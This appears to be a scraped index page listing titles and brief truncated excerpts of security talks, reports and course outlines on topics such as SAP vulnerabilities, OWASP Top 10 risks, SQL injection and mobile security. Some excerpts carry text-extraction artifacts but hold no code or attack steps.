Easy and quick vulnerability hun5ng in Windows. Cesar Cerrudo CTO at IOAc5ve Labs Easy and quick vulnerability hun5ng in Windows Cesar Cerrudo CTO at IOAc5ve Labs 1 Who am I? CTO at IOAc5ve Labs Leading efforts to produce cufng edge research I have been working on security for +9 years

More information

Five Nightmares for a Telecom

Five Nightmares for a Telecom Five Nightmares for a Telecom Dmitry Kurbatov Information security specialist Positive Technologies Webinars by Positive Technologies Agenda Physical access to a base station network OSS vulnerabilities

More information

Click to edit Master text styles

Click to edit Master text styles Frederik Weidemann TITEL bearbeiten Dr. Markus Schumacher Five years of ABAP TM -Code-Reviews A retrospective 2011 2012 Virtual Forge GmbH www.virtualforge.com All rights reserved. TITEL About bearbeiten

More information

You ve got mail Owning an SAP running business via

You ve got mail Owning an SAP running business via You ve got mail Owning an SAP running business via email Agenda Introduction State of SAP security Mail & SAP Vulnerabilities Solutions Introduction Company specialised in securing SAP systems and infrastructures

More information

ERPSCAN SMART SOLUTIONS FOR GDPR COMPLIANCE BY MICHAEL RAKUTKO, HEAD OF PROFESSIONAL SERVICES

ERPSCAN SMART SOLUTIONS FOR GDPR COMPLIANCE BY MICHAEL RAKUTKO, HEAD OF PROFESSIONAL SERVICES ERPSCAN SMART SOLUTIONS FOR GDPR COMPLIANCE BY MICHAEL RAKUTKO, HEAD OF PROFESSIONAL SERVICES ROADMAP How to implement GDPR in SAP? 1. GDPR security requirements 2. How to discover personal data? 3. How

More information

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14 Attacks Against Websites 3 The OWASP Top 10 Tom Chothia Computer Security, Lecture 14 OWASP top 10. The Open Web Application Security Project Open public effort to improve web security: Many useful documents.

More information

SQL Injec*on. By Robin Gonzalez

SQL Injec*on. By Robin Gonzalez SQL Injec*on By Robin Gonzalez Some things that can go wrong Excessive and Unused Privileges Privilege Abuse Input Injec>on Malware Week Audit Trail Other things that can go wrong Storage Media Exposure

More information

Intercepting SNC-protected traffic

Intercepting SNC-protected traffic Intercepting SNC-protected traffic Martin Gallo Penetration Testing SME March 2017 Agenda Introduction Problem SAP Protocols SAP SNC (Secure Network Connections) Attack vectors Vulnerable scenarios Demo

More information

Uncovering SAP vulnerabilities: Reversing and breaking the Diag protocol

Uncovering SAP vulnerabilities: Reversing and breaking the Diag protocol Uncovering SAP vulnerabilities: Reversing and breaking the Diag protocol Martin Gallo Core Security Defcon 20 July 2012 P A G E Agenda Introduction Motivation and related work SAP Netweaver architecture

More information

Don t blink or how to create secure software. Bozhidar Bozhanov, LogSentinel

Don t blink or how to create secure software. Bozhidar Bozhanov, LogSentinel Don t blink or how to create secure software Bozhidar Bozhanov, CEO @ LogSentinel About me Senior software engineer and architect Founder & CEO @ LogSentinel Former IT and e-gov advisor to the deputy prime

More information

Web Applica+on Security

Web Applica+on Security Web Applica+on Security Raluca Ada Popa Feb 25, 2013 6.857: Computer and Network Security See last slide for credits Outline Web basics: HTTP Web security: Authen+ca+on: passwords, cookies Security amacks

More information

Care & Feeding of Programmers: Addressing App Sec Gaps using HTTP Headers. Sunny Wear OWASP Tampa Chapter December

Care & Feeding of Programmers: Addressing App Sec Gaps using HTTP Headers. Sunny Wear OWASP Tampa Chapter December Care & Feeding of Programmers: Addressing App Sec Gaps using HTTP Headers Sunny Wear OWASP Tampa Chapter December Mee@ng 1 About the Speaker Informa@on Security Architect Areas of exper@se: Applica@on,

More information

Web Security 2 https://www.xkcd.com/177/ http://xkcd.com/1323/ Encryption basics Plaintext message key secret Encryp)on Func)on Ciphertext Insecure network Decryp)on Func)on Curses! Foiled again! key Plaintext

More information

RBS NetGain Enterprise Manager Multiple Vulnerabilities of 11

RBS NetGain Enterprise Manager Multiple Vulnerabilities of 11 RBS-2018-004 NetGain Enterprise Manager Multiple Vulnerabilities 2018-03-22 1 of 11 Table of Contents Vendor / Product Information 3 Vulnerable Program Details 3 Credits 3 Impact 3 Vulnerability Details

More information

RiskSense Attack Surface Validation for Web Applications

RiskSense Attack Surface Validation for Web Applications RiskSense Attack Surface Validation for Web Applications 2018 RiskSense, Inc. Keeping Pace with Digital Business No Excuses for Not Finding Risk Exposure We needed a faster way of getting a risk assessment

More information

Advanced Diploma on Information Security

Advanced Diploma on Information Security Course Name: Course Duration: Prerequisites: Course Fee: Advanced Diploma on Information Security 300 Hours; 12 Months (10 Months Training + 2 Months Project Work) Candidate should be HSC Pass & Basic

More information

Using the Cisco ACE Application Control Engine Application Switches with the Cisco ACE XML Gateway

Using the Cisco ACE Application Control Engine Application Switches with the Cisco ACE XML Gateway Using the Cisco ACE Application Control Engine Application Switches with the Cisco ACE XML Gateway Applying Application Delivery Technology to Web Services Overview The Cisco ACE XML Gateway is the newest

More information

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati OWASP TOP 10 2017 Release Andy Willingham June 12, 2018 OWASP Cincinnati Agenda A quick history lesson The Top 10(s) Web Mobile Privacy Protective Controls Why have a Top 10? Software runs the world (infrastructure,

More information

Invest in security to secure investments. With BIGDATA comes BIG Responsibility: Prac;cal exploi;ng of MDX injec;ons

Invest in security to secure investments. With BIGDATA comes BIG Responsibility: Prac;cal exploi;ng of MDX injec;ons Invest in security to secure investments With BIGDATA comes BIG Responsibility: Prac;cal exploi;ng of MDX injec;ons Dmitry Chastukhin Director of SAP pentest/research team Alexander Bolshev Security analyst,

More information

Your Turn to Hack the OWASP Top 10!

Your Turn to Hack the OWASP Top 10! OWASP Top 10 Web Application Security Risks Your Turn to Hack OWASP Top 10 using Mutillidae Born to Be Hacked Metasploit in VMWare Page 1 https://www.owasp.org/index.php/main_page The Open Web Application

More information

Hackveda Training - Ethical Hacking, Networking & Security

Hackveda Training - Ethical Hacking, Networking & Security Hackveda Training - Ethical Hacking, Networking & Security Day1: Hacking windows 7 / 8 system and security Part1 a.) Windows Login Password Bypass manually without CD / DVD b.) Windows Login Password Bypass

More information

VULNERABILITIES IN 2017 CODE ANALYSIS WEB APPLICATION AUTOMATED

VULNERABILITIES IN 2017 CODE ANALYSIS WEB APPLICATION AUTOMATED AUTOMATED CODE ANALYSIS WEB APPLICATION VULNERABILITIES IN 2017 CONTENTS Introduction...3 Testing methods and classification...3 1. Executive summary...4 2. How PT AI works...4 2.1. Verifying vulnerabilities...5

More information

Layer Seven Security ADVISORY. SAP Security Notes

Layer Seven Security ADVISORY. SAP Security Notes Layer Seven Security ADVISORY SAP Security Notes August 2017 Note 2381071 patches a critical cross-site Ajax vulnerability in the Prototype JS library of BusinessObjects. Ajax is a method often used by

More information

CISC So*ware Quality Assurance

CISC So*ware Quality Assurance CISC 327 - So*ware Quality Assurance Lecture 29b Web Applica>on Security CISC327-2003 2017 J.R. Cordy, S. Grant, J.S. Bradbury, J. Dunfield Outline Web Applica>on Security SQL Injec>on Parameter Manipula>on

More information

CSCI 1800 Cybersecurity and Interna4onal Rela4ons. Network Based Cyber A1acks John E. Savage Brown University

CSCI 1800 Cybersecurity and Interna4onal Rela4ons. Network Based Cyber A1acks John E. Savage Brown University CSCI 1800 Cybersecurity and Interna4onal Rela4ons Network Based Cyber A1acks John E. Savage Brown University Outline Firewalls, inward and outward facing. Tunneling SSH, IPsec Intrusion detec4on Types

More information

Rootkits and Trojans on Your SAP Landscape

Rootkits and Trojans on Your SAP Landscape Rootkits and Trojans on Your SAP Landscape SAP Security and the Enterprise Ertunga Arsal SAP systems are the heart of many enterprises. Most critical business functions run on SAP Applications and the

More information

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any OWASP Top 10 Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any tester can (and should) do security testing

More information

SCALE 15x (c) 2017 Ty Shipman

SCALE 15x (c) 2017 Ty Shipman Please view my linked-in page (under See more) to get a copy of this presenta

More information

SECURITY TRENDS & VULNERABILITIES REVIEW WEB APPLICATIONS

SECURITY TRENDS & VULNERABILITIES REVIEW WEB APPLICATIONS SECURITY TRENDS & VULNERABILITIES REVIEW WEB APPLICATIONS Contents Introduction...3 1. Research Methodology...4 2. Executive Summary...5 3. Participant Portrait...6 4. Vulnerability Statistics...8 4.1.

More information

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Application Security through a Hacker s Eyes James Walden Northern Kentucky University Application Security through a Hacker s Eyes James Walden Northern Kentucky University waldenj@nku.edu Why Do Hackers Target Web Apps? Attack Surface A system s attack surface consists of all of the ways

More information

How were the Credit Card Numbers Published on the Web? February 19, 2004

How were the Credit Card Numbers Published on the Web? February 19, 2004 How were the Credit Card Numbers Published on the Web? February 19, 2004 Agenda Security holes? what holes? Should I worry? How can I asses my exposure? and how can I fix that? Q & A Reference: Resources

More information

OWASP Top 10 The Ten Most Critical Web Application Security Risks

OWASP Top 10 The Ten Most Critical Web Application Security Risks OWASP Top 10 The Ten Most Critical Web Application Security Risks The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain

More information

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities Ethical Hacking and Countermeasures: Web Chapter 3 Web Application Vulnerabilities Objectives After completing this chapter, you should be able to: Understand the architecture of Web applications Understand

More information

C1: Define Security Requirements

C1: Define Security Requirements OWASP Top 10 Proactive Controls IEEE Top 10 Software Security Design Flaws OWASP Top 10 Vulnerabilities Mitigated OWASP Mobile Top 10 Vulnerabilities Mitigated C1: Define Security Requirements A security

More information

Kaseya Fundamentals Workshop DAY TWO. Developed by Kaseya University. Powered by IT Scholars

Kaseya Fundamentals Workshop DAY TWO. Developed by Kaseya University. Powered by IT Scholars Kaseya Fundamentals Workshop DAY TWO Developed by Kaseya University Powered by IT Scholars Kaseya Version 6.5 Last updated March, 2014 Day One Review IT- Scholars Virtual LABS System Management Organiza@on

More information

Threat modeling. Tuomas Aura T Informa1on security technology. Aalto University, autumn 2012

Threat modeling. Tuomas Aura T Informa1on security technology. Aalto University, autumn 2012 Threat modeling Tuomas Aura T- 110.4206 Informa1on security technology Aalto University, autumn 2012 Threats Threat = something bad that can happen Given an system or product Assets: what is there to protect?

More information

Vulnerabilities in online banking applications

Vulnerabilities in online banking applications Vulnerabilities in online banking applications 2019 Contents Introduction... 2 Executive summary... 2 Trends... 2 Overall statistics... 3 Comparison of in-house and off-the-shelf applications... 6 Comparison

More information

Layer Seven Security ADVISORY

Layer Seven Security ADVISORY Layer Seven Security ADVISORY SAP Security Notes June 01 SAP released several patches for multiple vulnerabilities effecting Sybase EAServer in June. EAServer is used to create, deploy and configure Java

More information

OWASP. XML Attack Surface. Business Analytics Security Competency Group

OWASP. XML Attack Surface. Business Analytics Security Competency Group XML Attack Surface Business Analytics Security Competency Group XML is Pervasive 2/32 XML intro Born in 1998 (see initial specifications) Data interchange format Parsers International languages support

More information

Copyright

Copyright 1 Security Test EXTRA Workshop : ANSWER THESE QUESTIONS 1. What do you consider to be the biggest security issues with mobile phones? 2. How seriously are consumers and companies taking these threats?

More information

Attacking Mobile Broadband Modems Like A Criminal Would. Andreas IT-SeCX 2014

Attacking Mobile Broadband Modems Like A Criminal Would. Andreas IT-SeCX 2014 Attacking Mobile Broadband Modems Like A Criminal Would Andreas Lindh, @addelindh, IT-SeCX 2014 whoami Security Analyst with I Secure Sweden Technical generalist Not really an expert on anything I like

More information

Why bother? Causes of data breaches OWASP. Top ten attacks. Now what? Do it yourself Questions?

Why bother? Causes of data breaches OWASP. Top ten attacks. Now what? Do it yourself Questions? Jeroen van Beek 1 Why bother? Causes of data breaches OWASP Top ten attacks Now what? Do it yourself Questions? 2 In many cases the web application stores: Credit card details Personal information Passwords

More information

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components CNIT 129S: Securing Web Applications Ch 10: Attacking Back-End Components Injecting OS Commands Web server platforms often have APIs To access the filesystem, interface with other processes, and for network

More information

Protecting SAP HANA from vulnerabilities and exploits. MARCH TROOPERS Security Conference, Heidelberg

Protecting SAP HANA from vulnerabilities and exploits. MARCH TROOPERS Security Conference, Heidelberg Protecting SAP HANA from vulnerabilities and exploits MARCH 2017 - TROOPERS Security Conference, Heidelberg Disclaimer This presentation contains references to the products of SAP SE. SAP, R/3, xapps,

More information

Executive Summary. Flex Bounty Program Overview. Bugcrowd Inc Page 2 of 7

Executive Summary. Flex Bounty Program Overview. Bugcrowd Inc Page 2 of 7 CANVAS by Instructure Bugcrowd Flex Program Results December 01 Executive Summary Bugcrowd Inc was engaged by Instructure to perform a Flex Bounty program, commonly known as a crowdsourced penetration

More information

SAP Security anno Tim Lynen, Manager axl & trax 2017

SAP Security anno Tim Lynen, Manager axl & trax 2017 SAP Security anno 2017 Tim Lynen, Manager axl & trax 2017 Agenda Introduction axl & trax Importance of landscape security Where to start Top items to focus on Security in the organization Q&A Introduction

More information

Attacking Next- Generation Firewalls

Attacking Next- Generation Firewalls Attacking Next- Generation Firewalls Breaking PAN-OS Felix Wilhelm #whoami Security Researcher @ ERNW Research Application and Virtualization Security Recent Research Hypervisors (Xen) Security Appliances

More information

Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma

Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma Indian Computer Emergency Response Team ( CERT - IN ) Department Of Information Technology 1 Agenda Introduction What are Web Applications?

More information

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report. Report on IRONWASP Software Product: IronWASP Description of the Product: IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing.

More information

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition Chapter 3 Investigating Web Attacks Objectives After completing this chapter, you should be able to: Recognize the indications

More information

CompTIA Security+ Malware. Threats and Vulnerabilities Vulnerability Management

CompTIA Security+ Malware. Threats and Vulnerabilities Vulnerability Management CompTIA Security+ Lecture Six Threats and Vulnerabilities Vulnerability Management Copyright 2011 - VTC Malware Malicious code refers to software threats to network and systems, including viruses, Trojan

More information

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP OWASP Top 10 Risks Dean.Bushmiller@ExpandingSecurity.com Many thanks to Dave Wichers & OWASP My Mom I got on the email and did a google on my boy My boy works in this Internet thing He makes cyber cafes

More information

Hacking Web Sites OWASP Top 10

Hacking Web Sites OWASP Top 10 Hacking Web Sites OWASP Top 10 Emmanuel Benoist Spring Term 2018 Berner Fachhochschule Haute cole spcialise bernoise Berne University of Applied Sciences 1 Web Security: Overview of other security risks

More information

INNOV-09 How to Keep Hackers Out of your Web Application

INNOV-09 How to Keep Hackers Out of your Web Application INNOV-09 How to Keep Hackers Out of your Web Application Michael Solomon, CISSP PMP CISM Solomon Consulting Inc. www.solomonconsulting.com What is a Web Application? Any access to your data via the Internet

More information

Whitepaper on AuthShield Two Factor Authentication with SAP

Whitepaper on AuthShield Two Factor Authentication with SAP Whitepaper on AuthShield Two Factor Authentication with SAP By AuthShield Labs Pvt. Ltd Table of Contents Table of Contents...2 1.Overview...4 2. Threats to account passwords...5 2.1 Social Engineering

More information

Is Exploitation Over? Bypassing Memory Protections in Windows 7

Is Exploitation Over? Bypassing Memory Protections in Windows 7 Is Exploitation Over? Bypassing Memory Protections in Windows 7 Alexander Sotirov alex@sotirov.net About me Exploit development since 1999 Published research into reliable exploitation techniques: Heap

More information

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team Application Security Introduction Tara Gu IBM Product Security Incident Response Team About Me - Tara Gu - tara.weiqing@gmail.com - Duke B.S.E Biomedical Engineering - Duke M.Eng Computer Engineering -

More information

Web Application Security. Philippe Bogaerts

Web Application Security. Philippe Bogaerts Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security

More information

Exploi'ng Unpatched ios Vulnerabili'es for Fun and Profit

Exploi'ng Unpatched ios Vulnerabili'es for Fun and Profit Exploi'ng Unpatched ios Vulnerabili'es for Fun and Profit Yeongjin Jang, Tielei Wang, Byoungyoung Lee, and Billy Lau Georgia Tech Informa;on Security Center (GTISC) 1 Scope of this Presenta;on The process

More information

Symantec Data Loss Preven2on 12.5 Demo Presenta2on

Symantec Data Loss Preven2on 12.5 Demo Presenta2on Symantec Data Loss Preven2on 12.5 Demo Presenta2on 1 Our Understanding PROJECT DRIVERS & DATA TO PROTECT Regulatory compliance PCI, GLBA Data inventory and cleansing SSNs, CCNs [Replace these bullet points

More information

Compu&ng Services Strengthening Authen&ca&on. October 2016

Compu&ng Services Strengthening Authen&ca&on. October 2016 Compu&ng Services Strengthening Authen&ca&on October 2016 ID and password pair is the sole means of authen4ca4ng access AUTHENTICATION Current State o Email o File storage o Enterprise applica1ons (including

More information

Topics. Ensuring Security on Mobile Devices

Topics. Ensuring Security on Mobile Devices Ensuring Security on Mobile Devices It is possible right? Topics About viaforensics Why mobile security matters Types of security breaches and fraud Anticipated evolution of attacks Common mistakes that

More information